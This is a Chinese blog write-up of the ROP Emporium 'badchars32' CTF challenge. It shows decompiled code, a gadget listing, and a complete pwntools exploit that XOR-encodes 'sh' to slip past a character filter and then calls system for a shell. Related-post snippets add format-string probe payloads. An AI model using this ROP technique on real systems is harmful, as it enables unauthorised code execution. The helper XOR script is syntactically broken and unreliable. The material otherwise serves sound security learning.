pwn暑假训练(五) 哇哇好久没打了

最新推荐文章于 2023-12-14 14:32:46 发布
最新推荐文章于 2023-12-14 14:32:46 发布
阅读量319 收藏
点赞数
分类专栏: 学习 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/98748279
版权

发现自己太菜所以自闭了几天~~
做了个32pwn(badchars)记录一下
这道题IDA打开我们就会发现

void pwnme()
{
  char *v0; // ST1C_4
  size_t n; // ST18_4
  void *s; // [esp+Ch] [ebp-2Ch]
  int v3; // [esp+10h] [ebp-28h]

  s = malloc(0x200u);
  if ( !s )
    exit(1);
  memset(s, 0, 0x200u);
  memset(&v3, 0, 0x20u);
  puts("badchars are: b i c / <space> f n s");
  printf("> ");
  v0 = fgets((char *)s, 512, stdin);
  n = nstrlen(v0, 512);
  checkBadchars(v0, n);
  memcpy(&v3, v0, n);
  free(v0);
}

这个有个后门是

int usefulFunction()
{
  return system("/bin/ls");
}

不是/sh…我们就要想办法输入/sh但好像这里检查了字符的输入

unsigned int __cdecl checkBadchars(int a1, unsigned int a2)
{
  unsigned int result; // eax
  char v3; // [esp+0h] [ebp-10h]
  char v4; // [esp+1h] [ebp-Fh]
  char v5; // [esp+2h] [ebp-Eh]
  char v6; // [esp+3h] [ebp-Dh]
  char v7; // [esp+4h] [ebp-Ch]
  char v8; // [esp+5h] [ebp-Bh]
  char v9; // [esp+6h] [ebp-Ah]
  char v10; // [esp+7h] [ebp-9h]
  unsigned int j; // [esp+8h] [ebp-8h]
  unsigned int i; // [esp+Ch] [ebp-4h]

  v3 = 98;
  v4 = 105;
  v5 = 99;
  v6 = 47;
  v7 = 32;
  v8 = 102;
  v9 = 110;
  v10 = 115;
  j = 0;
  for ( i = 0; ; ++i )
  {
    result = i;
    if ( i >= a2 )
      break;
    for ( j = 0; j <= 7; ++j )
    {
      if ( *(_BYTE *)(a1 + i) == *(&v3 + j) )
      {
        *(_BYTE *)(a1 + i) = -21;
        break;
      }
    }
  }
  return result;
}

所以我们就只有编码或加密直接异或要快
上异或的脚本

a=[98,105,99,47,32,102,110,115]
bin_sh="/bin/sh\x00"
xor_value=1


while true:
	for  x in bin_sh:
		y=ord(x)^xor_value
			if y in a:
				xor_value+=1
				break
		if x=='/x00':
			print xor_value
			break
	if xor_value==10:
	break

我自己写的可能会写错…我直接用大佬给的0xff
然后就是找可以ROP的地方了我们发现有个l函数可以让我们将字符xor解密

.text:08048890                 public usefulGadgets
.text:08048890 usefulGadgets:
.text:08048890                 xor     [ebx], cl
.text:08048892                 retn
.text:08048893 ; ---------------------------------------------------------------------------
.text:08048893                 mov     [edi], esi
.text:08048895                 retn
.text:08048896 ; ---------------------------------------------------------------------------
.text:08048896                 pop     ebx
.text:08048897                 pop     ecx
.text:08048898                 retn
.text:08048899 ; ---------------------------------------------------------------------------
.text:08048899                 pop     esi
.text:0804889A                 pop     edi
.text:0804889B                 retn
.text:0804889B ; ---------------------------------------------------------------------------

这里我们就可以构造ROP了先用pop esi,pop edi 然后用mov将加密其写入到bss段然后在用xor解密直接上exp:

from pwn import *
p=process('../badchars32')
elf=ELF('../badchars32')
system_addr = elf.plt['system']
bss_addr=elf.bss()
binstr='sh\x00\x00'
xor_value=0xff
xorsh=''
pop_edi_esi=0x08048899
mov_edi_esi=0x08048893
pop_edx_ecx=0x08048896
xor_edx_ecx=0x08048890

for i in range(4):
    xorsh+=chr(ord(binstr[i])^xor_value)

payload='a'*(0x28+0x4)
payload+=p32(pop_edi_esi)
payload+=xorsh
payload+=p32(bss_addr)
payload+=p32(mov_edi_esi)

for i in range(4):
    payload+=p32(pop_edx_ecx)
    payload+=p32(bss_addr+i)
    payload+=p32(xor_value)
    payload+=p32(xor_edx_ecx)

payload+=p32(system_addr)
payload+='aaaa'
payload+=p32(bss_addr)
p.recvuntil('> ')
p.sendline(payload)
p.interactive()

pwn好难

doudoudedi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 8
    评论
专栏目录
writeUP-[第空间2019 决赛]PWN5(待进一步完善待研究内容)
weixin_52111404的博客
08-02 2222
通过PWN5一题尝试理解格式化字符串漏洞。
buuctf之[第空间2019 决赛]PWN5
最新发布
weixin_54452942的博客
04-01 610
简单易懂~
BUUCTF [第空间2019 决赛]PWN5
红叶的博客
10-31 1387
输入探测格式化字符串的payload,AAAA-%x-%x-%x-%x-%x,A的ASCII码值为65(0x41),因此是图中选中的段。通过 fmtstr_payload 将 dword_804C044 的内容替换为0x1,而非随机数。因为我们已经知道偏移量了,可以使用pwntools的 fmtstr_payload 函数。但是这次是将 dword_804C044 修改为任意值,然后再次输入此值即可获取shell。或者还有一个,AAAA-%p-%p-%p-%p-%p-%p,32位64位通用。
[BUUCTF]PWN——[第空间2019 决赛]PWN5
BangSen1的博客
03-25 4338
[第空间2019 决赛]PWN5 例行检查,32位,开启了canary保护和NX保护。 运行一下。 IDA打开,看到了/bin/sh,但开启了保护 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 按我的理解就是输入的参数的个数是不固定的,是由前面的格式化字符串决定的,所以我们只要控制了前面的格式化字符串,再结合一些参数,后面输出什么就是由我们决定的;如: %d 用于读取10进制数值 %x
BUUCTF--pwn--[第空间2019 决赛]PWN5【格式化字符串】
qq_73149934的博客
12-10 791
BUUCTF--pwn--[第空间2019 决赛]PWN5
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
welpwn pwn 入门题
02-11
pwn 入门题
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
[BUUCTF]-PWN:[第空间2019 决赛]PWN5解析
2301_79326813的博客
12-14 331
这里之所以能这样利用是利用了动态链接的延迟绑定,当函数第一次调用时会把该函数真正的地址写入got表内,之后的调用都会从got表内存的地址去调用,大致是plt->got->addr,atoi的plt表里存的是atoi的got地址,atoi的got里存的是atoi在程序中的真正地址,我们修改atoi的got的内容,那他在调用atoi的plt时就会直接调用system的plt,system的plt就会调用system的got,从而实现调用system函数。这里有大致有两种思路,都运用了格式化字符串漏洞。
[第空间2019 决赛]PWN5
qq_41853048的博客
06-15 104
今年国赛线下awdp,逆向手坐牢,临时抱佛脚吧。
[第空间2019 决赛]PWN5-BUUCTF-格式化字符串
yuqie的博客
07-07 263
第一眼就看到了'system',看一下条件,这里的atoi函数指的是把字符串转换成整数,而'nptr'就是输入的'passwd',再看看另外一个'dword_804C044'表示这个'0x804C044'地址,那意思就是如果输入的'passwd'的值与'dword_804C044'相等就行了,那就改写一下'0x804C044'的值。'指向的内存位置中。这个表示从上面的文件中读取4个字节的字符,并将读取的数据存储到。有canary,栈溢出无望。数了一下,偏移量为10。
【BUU】[第空间2019 决赛]PWN5
bzduanlei的博客
07-31 406
一、前置知识 1、%n,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。 2、如何确定存储格式化字符串的地址是 printf 将要输出的第几个参数? ​ 运行程序后,在格式化字符串漏洞的位置输入AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p,看AAAA的数值对应在格式化字符串的第几个参数。 可以看到,AAAA对应的数值0x41414141在格式化字符串的第10个参数。 二、解题思路 0x01 分析文件 0x02 拖入IDA 3
ROP Emporium badchars32 wp
devil8123665的博客
03-26 728
wp 1 IDA进行分析发现溢出函数 1、溢出函数 int pwnme() { unsigned int v1; // [esp+0h] [ebp-38h] unsigned int i; // [esp+4h] [ebp-34h] unsigned int j; // [esp+8h] [ebp-30h] char v4[36]; // [esp+10h] [ebp-28h] BYREF ​ setvbuf(stdout, 0, 2, 0); puts("badchars..
ROP Emporium ALL Challenge
Pwnpanda的博客
07-18 966
暑假刷题计划-0x00 水平有限,这些只是前面大部分题目的WP,最后几道题暂时没做 题目来源:ROP Emporium 工具&amp;amp;&amp;amp;环境:IDA Pro、gdb+peda、ROPgadget、radare2、Ubuntu 16 ROP: 一步一步学ROP之linux_x86篇 一步一步学ROP之linux_x64篇 友情链接: 大佬博客:https://firmian...
CTF-浅尝64位栈溢出PWN
热门推荐
BadRer的博客
06-04 1万+
干了一早上终于把这道’难题’做出来了,实在是不容易。头一次完完全全的做出64位的pwn题,如果就栈溢出来说的话,其实感觉和32位的也差不多。至少这方面没有遇到太大的困难,做64位的题对汇编指令的要求就更高了。正好一边做题,一边多学点汇编。 收获是很大的。正文刚开始被一个逻辑漏洞cmp给卡着,一直没有跳到真正产生漏洞的地方,好不容易跳过去了,结果被我自己坑了(写脚本的时候,没有考虑缓冲区的影响,经常
NYCTF reverse ---------single
还木人的博客
08-21 509
这道题目是南京邮电CTF平台的reverse题目single(最后一道,但不是最有难度的一道) 题目链接如下:https://cgctf.nuptsast.com/challenges#Re 不多讲,拖进IDA分析,如下: __int64 __fastcall main(__int64 a1, char **a2, char **a3) { char s; // [rsp+0h] [r...
高级栈溢出技术—ROP实战(badchars)
ChuMeng1999的博客
01-09 767
目录预备知识关于ROP本系列rop实战题目的背景badchars涉及知识点实验目的实验环境实验步骤一实验步骤二实验步骤三 预备知识 关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。 ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 本系列rop实战题目的背景 来自ROPEmpor
buuctf pwn空间决赛pwn5
09-28
buuctf pwn空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值